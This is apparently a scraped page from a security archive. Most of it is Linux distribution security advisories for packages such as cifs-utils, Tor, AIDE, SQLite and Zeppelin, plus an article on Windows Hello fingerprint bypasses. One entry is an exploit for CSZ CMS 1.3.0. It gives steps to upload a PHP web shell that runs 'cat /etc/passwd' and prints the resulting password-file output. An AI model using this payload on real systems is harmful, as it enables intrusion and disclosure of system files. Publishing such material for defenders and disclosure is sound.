Gentoo Linux Security Advisory 202311-5 - Multiple vulnerabilities have been discovered in LinuxCIFS utils, the worst of which can lead to local root privilege escalation. Versions greater than or equal to 6.15 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: LinuxCIFS utils: Multiple Vulnerabilities  
     Date: November 24, 2023  
     Bugs: #842234  
       ID: 202311-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in LinuxCIFS utils, the  
worst of which can lead to local root privilege escalation.

Background  
=========  
The LinuxCIFS utils are a collection of tools for managing Linux CIFS  
Client Filesystems.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
net-fs/cifs-utils  < 6.15        >= 6.15

Description  
==========  
Multiple vulnerabilities have been discovered in LinuxCIFS utils. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
A stack-based buffer overflow when parsing the mount.cifs ip= command-  
line argument could lead to local attackers gaining root privileges.

When verbose logging is enabled, invalid credentials file lines may be  
dumped to stderr. This may lead to information disclosure in particular  
conditions when the credentials file given is sensitive and contains '='  
signs.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All LinuxCIFS utils users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-fs/cifs-utils-6.15"

References  
=========  
[ 1 ] CVE-2022-27239  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27239  
[ 2 ] CVE-2022-29869  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29869

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-05

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-05

Debian Linux Security Advisory 5563-1 - Benoit Morgan, Paul Grosen, Thais Moreira Hamasaki, Ke Sun, Alyssa Milburn, Hisham Shafi, Nir Shlomovich, avis Ormandy, Daniel Moghimi, Josh Eads, Salman Qazi, Alexandra Sandulescu, Andy Nguyen, Eduardo Vela, Doug Kwan, and Kostik Shtoyk discovered that some Intel processors mishandle repeated sequences of instructions leading to unexpected behavior, which may result in privilege escalation, information disclosure or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5563-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoNovember 23, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : intel-microcodeCVE ID         : CVE-2023-23583Debian Bug     : 1055962Benoit Morgan, Paul Grosen, Thais Moreira Hamasaki, Ke Sun, AlyssaMilburn, Hisham Shafi, Nir Shlomovich, avis Ormandy, Daniel Moghimi,Josh Eads, Salman Qazi, Alexandra Sandulescu, Andy Nguyen, Eduardo Vela,Doug Kwan, and Kostik Shtoyk discovered that some Intel processorsmishandle repeated sequences of instructions leading to unexpectedbehavior, which may result in privilege escalation, informationdisclosure or denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 3.20231114.1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 3.20231114.1~deb12u1.We recommend that you upgrade your intel-microcode packages.For the detailed security status of intel-microcode please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/intel-microcodeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVfcuFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SRaw/+JwZlE+c2OdKBuLSQCrlASs1iM+iDrbEYKWU/F+RX5HZgB7O5d953MSnC3jIE0+93CY0oW6iwc3ZTaY4cVt7bVC5MmAzkhcVuxLFNqHoBMUtiqIFX4TguWokALnuXQRrs6+DyZ+3C0gcvHtINnEJzlhS8Oqb0xyJQqSlpYiNng7Wa/F8rfLYGWh6ZN+KIYlyVRBfSO+9pMhRFCM29DWdakdgC5KfHNtRENZxpgeGRxCQQuJIs30hIqKc2Zma3AcSDU3hiHYSXTD7GjMxD5MYkV0U3ervXgcsfpmbW0rczOOK49VZHdQC2frYPEYnFGSMwl72adEtdKctocqRSjtnAbCanEY8Ses7ihTB5l9H7u4TXgzJrHnZSiZ0LXd08AJ8m5zglYg9t4UF3qRYgbdRdAvcOpqggAsZVT5UJWVTVP1rAXhyWGXqh39k9/+JAwjJUTVBIkgJMWPWvj9vLeR7fNKNkJPRfi6wRVZ+cWf5Z2/VqHRkjgT4pDImyadFzRFFzy2JLLett0wpF7Elkpb/0RFOmZw0GbBIOM3XU+/OD93TcT0o0i4gU7DHiW/tEOUk7tnGcIAz3/h9yaOVObm36RdiAHZ+Mprk/GpiSLBsfBQueo+gra2vo0qcqpEgA2XiHqT1LQeqcfJ5AXvdBZAL4bxeWx6DteLL6k1OLrvg4qUc=l9kq-----END PGP SIGNATURE-----

Debian Security Advisory 5563-1

Ubuntu Security Notice 6511-1 - It was discovered that the OpenZFS sharenfs feature incorrectly handled IPv6 address data. This could result in IPv6 restrictions not being applied, contrary to expectations.

==========================================================================  
Ubuntu Security Notice USN-6511-1  
November 23, 2023

zfs-linux vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

OpenZFS could allow unintended access to network services.

Software Description:  
- zfs-linux: OpenZFS filesystem for Linux

Details:

It was discovered that the OpenZFS sharenfs feature incorrectly handled  
IPv6 address data. This could result in IPv6 restrictions not being  
applied, contrary to expectations.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   libuutil3linux                  2.1.9-2ubuntu1.2  
   zfsutils-linux                  2.1.9-2ubuntu1.2

Ubuntu 22.04 LTS:  
   libuutil3linux                  2.1.5-1ubuntu6~22.04.2  
   zfsutils-linux                  2.1.5-1ubuntu6~22.04.2

Ubuntu 20.04 LTS:  
   libuutil1linux                  0.8.3-1ubuntu12.16  
   zfsutils-linux                  0.8.3-1ubuntu12.16

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6511-1  
   CVE-2013-20001

Package Information:  
   https://launchpad.net/ubuntu/+source/zfs-linux/2.1.9-2ubuntu1.2  
   https://launchpad.net/ubuntu/+source/zfs-linux/2.1.5-1ubuntu6~22.04.2  
   https://launchpad.net/ubuntu/+source/zfs-linux/0.8.3-1ubuntu12.16

Ubuntu Security Notice USN-6511-1

Debian Linux Security Advisory 5562-1 - It was discovered that Tor was susceptible to a crash during handshake with a remote relay, resulting in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5562-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 22, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : torCVE ID         : not yet availableIt was discovered that Tor was susceptible to a crash during handshakewith a remote relay, resulting in denial of service.For the oldstable distribution (bullseye), support for tor is nowdiscontinued. Please upgrade to the stable release (bullseye) to continuereceiving tor updates.For the stable distribution (bookworm), this problem has been fixed inversion 0.4.7.16-1.We recommend that you upgrade your tor packages.For the detailed security status of tor please refer toits security tracker page at:https://security-tracker.debian.org/tracker/torFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVeVPMACgkQEMKTtsN8TjbMIA/9EhW1HGw07Hn4iLfT369mukHIEN8TNTS1hGwRKJAf0yZFnqdqdKJ7EsBINIh8LlaHxq09JmMN92oMSvenMMrmpCYCRL2UicPTO59ChueUmIH9gLgr1EqWly2b/A09bfCc3TXA35XDzdFWHuI6k6BV6YVQXfeJP4Xxqg+wrYoXSKq1urhtCIT8+11mmylwKsE0uaIAatMhpLRDPCc4yp0brQTklup+bn7GMpgQbbyuPHazJMYmU7qgRh2u9KPa7XMTt1mpx/b55TRQ2EatVwpHukY131putTfV195i96yD/wECZ9R/ey/maF17EGDq+FtnTus1ePuZmV5eVAZRe1+4wOlUoUggVysJUsor6CYIJ0gTwdozXRzFfR4nkfF+odUBhJAivLvPi9UB0iLo3o3c0l83l0tHRsCVC3TtBo1svo8Q4Ri9p8U1ajmKh8AaNHzGgxwdmot5vbTkyO/Hy4tR7Z3PTWne2OsiL0NcQdQZ1/Cxbcr0h3BFF0fkYtQhG4pMa7luQxQC4GSAVQqKqB4IR4RnSHflCpQcbNm3g9UyYv6G4m6RmVfRuSlaG04TOz3MkLqzdn3iKLsyMbQw2Ojq6CWRUYa4QazjIb6owFjQnarUGKDxlnKtJW2W4IJVCi0Wgt2HwmgCtXjOEqtyhdPhlCGNEViocseong99Mz0Sm6E==H3jh-----END PGP SIGNATURE-----

Debian Security Advisory 5562-1

Gentoo Linux Security Advisory 202311-7 - A vulnerability has been found in AIDE which can lead to root privilege escalation. Versions greater than or equal to 0.17.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: AIDE: Root Privilege Escalation  
     Date: November 25, 2023  
     Bugs: #831658  
       ID: 202311-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in AIDE which can lead to root privilege  
escalation.

Background  
==========

AIDE (Advanced Intrusion Detection Environment) is a file and directory  
integrity checker.

It creates a database from the regular expression rules that it finds  
from the config file(s). Once this database is initialized it can be  
used to verify the integrity of the files. It has several message digest  
algorithms (see below) that are used to check the integrity of the file.  
All of the usual file attributes can also be checked for  
inconsistencies.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
app-forensics/aide  < 0.17.4      >= 0.17.4

Description  
===========

A vulnerability has been discovered in AIDE. Please review the CVE  
identifier referenced below for details.

Impact  
======

AIDE before 0.17.4 allows local users to obtain root privileges via  
crafted file metadata (such as XFS extended attributes or tmpfs ACLs),  
because of a heap-based buffer overflow.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All AIDE users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-forensics/aide-0.17.4"

References  
==========

[ 1 ] CVE-2021-45417  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45417

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-07

Gentoo Linux Security Advisory 202311-6 - Multiple vulnerabilities have been discovered in multipath-tools, the worst of which can lead to root privilege escalation. Versions greater than or equal to 0.9.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: multipath-tools: Multiple Vulnerabilities  
     Date: November 25, 2023  
     Bugs: #878763  
       ID: 202311-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in multipath-tools, the  
worst of which can lead to root privilege escalation.

Background  
==========

multipath-tools are used to drive the Device Mapper multipathing driver.

Affected packages  
=================

Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
sys-fs/multipath-tools  < 0.9.3       >= 0.9.3

Description  
===========

Multiple vulnerabilities have been discovered in multipath-tools. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All multipath-tools users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-fs/multipath-tools-0.9.3"

References  
==========

[ 1 ] CVE-2022-41973  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41973  
[ 2 ] CVE-2022-41974  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41974

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-06

Gentoo Linux Security Advisory 202311-4 - Multiple vulnerabilities have been discovered in Zeppelin, the worst of which could lead to remote code execution. Versions greater than or equal to 0.10.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Zeppelin: Multiple Vulnerabilities  
     Date: November 24, 2023  
     Bugs: #811447  
       ID: 202311-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Zeppelin, the worst of  
which could lead to remote code execution.

Background  
==========

Apache Zeppelin is a web-based notebook that enables data-driven,  
interactive data analytics and collaborative documents with SQL, Scala,  
Python, R and more.

Affected packages  
=================

Package                Vulnerable    Unaffected  
---------------------  ------------  ------------  
www-apps/zeppelin-bin  < 0.10.1      >= 0.10.1

Description  
===========

Multiple vulnerabilities have been discovered in Zeppelin. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Zeppelin users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-apps/zeppelin-bin-0.10.1"

References  
==========

[ 1 ] CVE-2019-10095  
      https://nvd.nist.gov/vuln/detail/CVE-2019-10095  
[ 2 ] CVE-2020-13929  
      https://nvd.nist.gov/vuln/detail/CVE-2020-13929  
[ 3 ] CVE-2021-27578  
      https://nvd.nist.gov/vuln/detail/CVE-2021-27578

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-04

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

**CSZ CMS 1.3.0 Shell Upload**

Posted Nov 25, 2023

Authored by tmrswrr

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | b8f0f3c59686781c297f072ed9c3ca2896c1c6ea8f3916447a7e73c9086eb19a

Download | Favorite | View

**CSZ CMS 1.3.0 Shell Upload**

    # Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution# Date: 23/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.cszcms.com/# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download# Version: Version 1.3.0# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSqwoqwrdkog/admin/upgrade2 ) System Upgrade Manually  and upload this test.zip file :<?php echo system('cat /etc/passwd'); ?>3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.phproot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

**File Tags**

*   ActiveX (932)
*   Advisory (83,267)
*   Arbitrary (16,401)
*   BBS (2,859)
*   Bypass (1,803)
*   CGI (1,029)
*   Code Execution (7,417)
*   Conference (682)
*   Cracker (843)
*   CSRF (3,353)
*   DoS (23,990)
*   Encryption (2,372)
*   Exploit (52,241)
*   File Inclusion (4,233)
*   File Upload (977)
*   Firewall (822)
*   Info Disclosure (2,807)
*   Intrusion Detection (900)
*   Java (3,091)
*   JavaScript (879)
*   Kernel (6,834)
*   Local (14,569)
*   Magazine (586)
*   Overflow (12,849)
*   Perl (1,426)
*   PHP (5,162)
*   Proof of Concept (2,349)
*   Protocol (3,652)
*   Python (1,566)
*   Remote (31,026)
*   Root (3,605)
*   Rootkit (515)
*   Ruby (614)
*   Scanner (1,645)
*   Security Tool (7,926)
*   Shell (3,209)
*   Shellcode (1,216)
*   Sniffer (897)
*   Spoof (2,229)
*   SQL Injection (16,436)
*   TCP (2,419)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,079)
*   Web (9,786)
*   Whitepaper (3,757)
*   x86 (966)
*   XSS (18,042)
*   Other

**File Archives**

*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   Older

**Systems**

*   AIX (429)
*   Apple (2,037)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,907)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,375)
*   HPUX (880)
*   iOS (363)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (47,744)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (14,557)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,110)
*   UNIX (9,338)
*   UnixWare (187)
*   Windows (6,605)
*   Other

CSZ CMS 1.3.0 Shell Upload

Gentoo Linux Security Advisory 202311-3 - Multiple vulnerabilities have been discovered in SQLite, the worst of which may lead to code execution. Versions greater than or equal to 3.42.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: SQLite: Multiple Vulnerabilities  
     Date: November 24, 2023  
     Bugs: #886029, #906114  
       ID: 202311-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in SQLite, the worst of  
which may lead to code execution.

Background  
==========

SQLite is a C library that implements an SQL database engine.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
dev-db/sqlite  < 3.42.0      >= 3.42.0

Description  
===========

Multiple vulnerabilities have been discovered in SQLite. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All SQLite users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-db/sqlite-3.42.0"

References  
==========

[ 1 ] CVE-2021-31239  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31239  
[ 2 ] CVE-2022-46908  
      https://nvd.nist.gov/vuln/detail/CVE-2022-46908

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-03

Researchers have found several weaknesses in the fingerprint authentication for Windows Hello on popular laptops.

Researchers have found several weaknesses in Windows Hello fingerprint authentication on Dell Inspiron 15, Lenovo ThinkPad T14, and Microsoft Surface Pro X laptops.

Microsoft’s Offensive Research and Security Engineering (MORSE) asked the researchers to evaluate the security of the top three fingerprint sensors embedded in laptops. They found vulnerabilities that allowed them to completely bypass Windows Hello authentication on all three.

If you like to read the full technical details, we happily refer you to the Blackwing researcher’s blog: A TOUCH OF PWN – PART I. For a less technical summary, carry on.

First but foremost, it’s important to know that for these vulnerabilities to be exploitable, fingerprint authentication needs to be set up on the target laptop. Imagine the type of disaster if that wasn’t true.

The three sensors the researchers looked at were all of the “match on chip” type. This means that a separate chip stores the biometric credentials (in this case the fingerprints), making it almost impossible to hack into.

The communication between the sensor and the laptop is done over a secure channel, set up through the Secure Device Connection Protocol (SDCP) created by Microsoft.

SDCP aims to answer three questions about the sensor:

1.  How can the laptop be certain it’s talking to a trusted sensor and not a malicious one?
2.  How can the lapop be certain the sensor hasn’t been compromised?
3.  How is the raw input from the sensor protected?
    *   The input has to be authenticated.
    *   The input is fresh and can’t be re-playable.

So, what could go wrong?

The researchers were still able to spoof the communication between sensor and laptops. They were able to fool the the laptops using a USB device which pretended to be its sensor, and sent a signal that an authorized user had logged in.

The bypasses are possible because the device manufacturers did not use SDCP to its full potential:

*   The ELAN sensor commonly used in Dell and Microsoft Surface laptops lacks SDCP support and transmits security identifiers in cleartext.
*   Synaptics sensors, used by both Lenovo and Dell, had turned SDCP off by default and used a flawed custom Transport Layer Security (TLS) stack to secure USB communications.
*   The Goodix sensors, also used by both Lenovo and Dell, could be bypassed because they are suitable for Windows and Linux, which does not support SDCP. The host driver sends an unauthenticated configuration packet to the sensor to specify what database to use during sensor initialization.

The recommendation of the researchers to the manufacturers is clear: SDCP is a powerful protocol, but it doesn’t help if it isn’t enabled or when it can be bypassed by using other weak links in your setup.

The fact that three manufacturers were mentioned by name doesn’t mean by any stretch that others have done a better job. It just means the researchers didn’t get round to testing them.

If you, as a user, are worried about anyone being able to get near your laptop with a USB device, you shouldn’t be using fingerprints as an authentication method and disabled.

1.  Type and search **\[Sign-in options\]** in the Windows search bar, then click **\[Open\]**.
2.  Select **\[Fingerprint recognition (Windows Hello)**, then click **\[Remove\]**, and the fingerprint sign-in option will be removed.

Until the manufacturers have dealt with the weaknesses in their setups, we can’t assume that this is a secure method of authentication.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#linux